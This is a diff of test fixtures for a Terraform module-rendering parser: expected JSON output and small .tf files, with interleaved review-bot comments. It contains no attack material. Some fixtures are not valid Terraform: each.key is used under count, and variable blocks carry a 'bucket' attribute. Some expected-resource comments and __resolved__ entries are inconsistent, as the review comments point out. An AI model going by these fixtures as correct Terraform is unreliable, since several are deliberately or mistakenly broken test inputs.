@@ -155,6 +155,64 @@ } ] }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module": { + "__end_line__": 4, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + false + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module[\"b\"].inner_s3_module" + } + }, + { + "inner_s3_module2": { + "__end_line__": 9, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 6, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module[\"b\"].inner_s3_module2" + } + } + ], + "variable": [ + { + "bucket": { + "__end_line__": 14, + "__start_line__": 12, + "type": [ + "string" + ], + "__address__": "module.s3_module[\"b\"].bucket" + } + }, + { + "bucket2": { + 
"__end_line__": 18, + "__start_line__": 16, + "type": [ + "string" + ], + "__address__": "module.s3_module[\"b\"].bucket2" + } + } + ] + }, "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}": { "module": [ { @@ -165,7 +223,7 @@ ], "__start_line__": 1, "bucket2": [ - "var.bucket" + "" ], "source": [ "./module2" @@ -181,7 +239,7 @@ ], "__start_line__": 6, "bucket2": [ - "var.bucket2" + true ], "source": [ "./module2" 
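Review bot: In the newly added `module.s3_module[\"b\"]` block, both `__resolved__` entries still name the parent instance as `\"name\": \"s3_module\", \"foreach_idx\": \"a\"` while the block's key and every `__address__` in it are instance `\"b\"`; the `s3_module2[1]` block added in the next hunk has the same mismatch, its `__resolved__` strings pointing at `\"foreach_idx\": 0`. If the resolver deliberately records one nested definition per source module rather than per instance, a short comment in the test that loads this fixture saying that `__resolved__` is not instance-specific would stop the next reader from treating this as a regression; otherwise the expected output is baking in a wrong cross-reference between instances. The enclosing JSON object begins and ends outside this hunk.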
@@ -213,11 +271,69 @@ } ] }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module": { + "__end_line__": 4, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module2[1].inner_s3_module" + } + }, + { + "inner_s3_module2": { + "__end_line__": 9, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 6, + "bucket2": [ + true + ], + "source": [ + "./module2" + ], + "__address__": "module.s3_module2[1].inner_s3_module2" + } + } + ], + "variable": [ + { + "bucket": { + "__end_line__": 14, + "__start_line__": 12, + "type": [ + "string" + ], + "__address__": "module.s3_module2[1].bucket" + } + }, + { + "bucket2": { + "__end_line__": 18, 
+ "__start_line__": 16, + "type": [ + "string" + ], + "__address__": "module.s3_module2[1].bucket2" + } + } + ] + }, "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + false ], "__address__": "module.s3_module[\"a\"].module.inner_s3_module.bucket2" } @@ -235,7 +351,7 @@ true ], "bucket": [ - "var.bucket" + false ], "ignore_public_acls": [ true @@ -243,7 +359,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -261,13 +378,13 @@ } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + false ], - "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" } ], "resource": [ @@ -283,7 +400,7 @@ true ], "bucket": [ - "var.bucket" + false ], "ignore_public_acls": [ true @@ -291,7 +408,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[0].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -304,18 +422,18 @@ "type": [ "string" ], - "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket2" + "" ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" } ], "resource": [ @@ -331,7 +449,7 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true @@ -339,7 +457,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[0].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -352,18 +471,18 @@ "type": [ "string" ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module.bucket2" } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket2" + "" ], - "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" + "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" } ], "resource": [ @@ -379,7 +498,7 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true @@ -387,7 +506,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[0].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[1].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -400,103 +520,18 @@ "type": [ "string" ], - "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/variable.tf\", \"tf_source_modules\": null}": { - "variable": [ - { - "count_var": { - "__end_line__": 4, - "__start_line__": 2, - "default": [ - 2 - ], - "__address__": "count_var" - } - }, - { - "foreach_var": { - "__end_line__": 8, - "__start_line__": 6, - "default": [ - [ - "a", - "b" - ] - ], - "__address__": "foreach_var" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module": { - "__end_line__": 4, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module" - } - }, - { - "inner_s3_module2": { - "__end_line__": 9, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": 
null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 6, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module2" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 14, - "__start_line__": 12, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket" - } - }, - { - "bucket2": { - "__end_line__": 18, - "__start_line__": 16, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket2" + "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + "" ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" } ], "resource": [ 
@@ -512,7 +547,7 @@ true ], "bucket": [ - "var.bucket" + "" ], "ignore_public_acls": [ true @@ -520,7 +555,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -533,7 +569,7 @@ "type": [ "string" ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module.bucket2" + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2" } } ] @@ -542,7 +578,7 @@ "locals": [ { "bucket2": [ - "var.bucket2" + "" ], "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.bucket2" } @@ -560,7 +596,7 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true @@ -568,7 +604,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } 
@@ -586,71 +623,13 @@ } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module": { - "__end_line__": 4, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module" - } - }, - { - "inner_s3_module2": { - "__end_line__": 9, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 6, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module2" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 14, - "__start_line__": 12, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket" - } - }, - { - "bucket2": { - 
"__end_line__": 18, - "__start_line__": 16, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { "bucket2": [ - "var.bucket" + true ], - "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" } ], "resource": [ @@ -666,7 +645,7 @@ true ], "bucket": [ - "var.bucket" + true ], "ignore_public_acls": [ true @@ -674,7 +653,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[1].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[0].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -687,7 +667,7 @@ "type": [ "string" ], - "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2" + "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2" } } ] 
@@ -696,7 +676,7 @@ "locals": [ { "bucket2": [ - "var.bucket2" + true ], "__address__": "module.s3_module2[1].module.inner_s3_module2.bucket2" } @@ -714,7 +694,7 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true @@ -722,7 +702,8 @@ "restrict_public_buckets": [ true ], - "__address__": "module.s3_module2[1].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket" + "__address__": "module.s3_module2[1].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket", + "__provider_address__": "" } } } @@ -739,5 +720,32 @@ } } ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/variable.tf\", \"tf_source_modules\": null}": { + "variable": [ + { + "count_var": { + "__end_line__": 4, + "__start_line__": 2, + "default": [ + 2 + ], + "__address__": "count_var" + } + }, + { + "foreach_var": { + "__end_line__": 8, + "__start_line__": 6, + "default": [ + [ + "a", + "b" + ] + ], + "__address__": "foreach_var" + } + } + ] } } \ No newline at end of file diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf new file mode 100644 index 00000000000..630b9b5e172 --- /dev/null +++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf @@ -0,0 +1,6 @@ +module "level2" { + source = "../level2_module" + for_each = var.file_map1_level1 + + times_to_duplicate_bucket = var.number_of_required_resources_var +} \ No newline at end of file 
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf
new file mode 100644
index 00000000000..4af133126f8
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf
@@ -0,0 +1,7 @@
+variable "file_map1_level1" {
+ type = map(string)
+}
+
+variable "number_of_required_resources_var" {
+ type = number
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf
new file mode 100644
index 00000000000..25c80ee2ef5
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf
@@ -0,0 +1,6 @@
+resource "aws_s3_bucket_object" "this_file" {
+ count = var.times_to_duplicate_bucket
+ bucket = "your_bucket_name"
+ key = each.key
+ source = each.value
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf
new file mode 100644
index 00000000000..e1e257b40fc
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf
@@ -0,0 +1,3 @@
+variable "times_to_duplicate_bucket" {
+ type = number
+}
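Review bot: In `level2_module/main.tf` the resource is expanded with `count = var.times_to_duplicate_bucket` but its `key` and `source` read `each.key` / `each.value`, which Terraform only defines for `for_each`; this fixture would not pass `terraform validate` and any renderer test built on it exercises an input real users cannot write. Use the count iterator instead, e.g. `key = count.index` and `source = count.index`, mirroring the `data_count` block in `data_simple/main.tf`, or switch the block to `for_each` if the counted expansion is not what the fixture is meant to cover.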
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf
new file mode 100644
index 00000000000..4477e9361ae
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf
@@ -0,0 +1,29 @@
+locals {
+ groups = {
+ "blue" = "blue"
+ "green" = "green"
+ }
+ files_map1 = {
+ "test1.txt" = "test1.txt"
+ "test2.txt" = "test2.txt"
+ }
+ number_of_required_resources = 2
+}
+
+# Expected resources:
+# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+# module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+# module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+# module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+# module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+
+module "level1" {
+ source = "./level1_module"
+ for_each = local.groups
+
+ file_map1_level1 = local.files_map1
+ number_of_required_resources_var = local.number_of_required_resources
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf
new file mode 100644
index 00000000000..885a68e53e8
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf
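Review bot: The "Expected resources" comment in the count example lists addresses ending in `this_file["test3.txt"]` / `this_file["test4.txt"]`, which are the for_each keys from the sibling foreach example; this fixture's leaf resource is expanded with `count = 2`, so the addresses a reader should expect end in `this_file[0]` and `this_file[1]` (eight in total, two per `level2` instance). Since these comments are the only statement of intent for the fixture, please correct them to the count form so a failing renderer test can be checked against them.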
@@ -0,0 +1,10 @@
+
+# Expected resources:
+# module.simple[0].aws_s3_bucket_object.this_file
+
+# Actual resources:
+# NONE
+module "simple" {
+ source = "./simple"
+ count = 1
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf b/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf
new file mode 100644
index 00000000000..f81b8cc8f28
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf
@@ -0,0 +1,14 @@
+data "aws_s3_bucket" "data_list" {
+ for_each = toset(var.test_list.bucket)
+ bucket = each.value
+}
+
+data "aws_s3_bucket" "data_dict" {
+ for_each = var.test_dict.bucket
+ bucket = each.value
+}
+
+data "aws_s3_bucket" "data_count" {
+ count = var.test_count.bucket
+ bucket = count.index
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf b/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf
new file mode 100644
index 00000000000..a96d924bd33
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf
@@ -0,0 +1,14 @@
+variable "test_list" {
+ bucket = ["a", "b"]
+}
+
+variable "test_dict" {
+ bucket = {
+ key1 = "a",
+ key2 = "b"
+ }
+}
+
+variable "test_count" {
+ bucket = 2
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf
new file mode 100644
index 00000000000..019ff3cc629
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf
@@ -0,0 +1,13 @@
+data "aws_s3_bucket" "data_dict" {
+ for_each = var.test_dict.bucket
+ bucket = each.value
+}
+
+data "aws_s3_bucket" "data_count" {
+ count = var.test_count.bucket
+ bucket = count.index
+}
+
+data "aws_s3_bucket" "data" {
+ bucket = "a"
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf
new file mode 100644
index 00000000000..ee85d8b430c
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf
@@ -0,0 +1,15 @@
+resource "aws_s3_bucket" "data_dict" {
+ for_each = var.test_dict.bucket
+ subnet_id = each.value
+ bucket = data.aws_s3_bucket.data_dict[each.key].bucket
+}
+
+
+resource "aws_s3_bucket" "data_count" {
+ count = var.test_count.bucket
+ bucket = data.aws_s3_bucket.data_count[count.index].bucket
+}
+
+resource "aws_s3_bucket" "data" {
+ subnet_id = data.aws_s3_bucket.data.bucket
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf
new file mode 100644
index 00000000000..02caf819d73
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf
@@ -0,0 +1,10 @@
+variable "test_dict" {
+ bucket = {
+ key1 = "a",
+ key2 = "b"
+ }
+}
+
+variable "test_count" {
+ bucket = 2
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf
new file mode 100644
index 00000000000..067fdda2b06
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf
@@ -0,0 +1,6 @@
+module "level2" {
+ source = "../level2_module"
+ for_each = var.file_map1_level1
+
+ file_map_level2 = var.file_map2_level1
+}
\ No newline at end of file
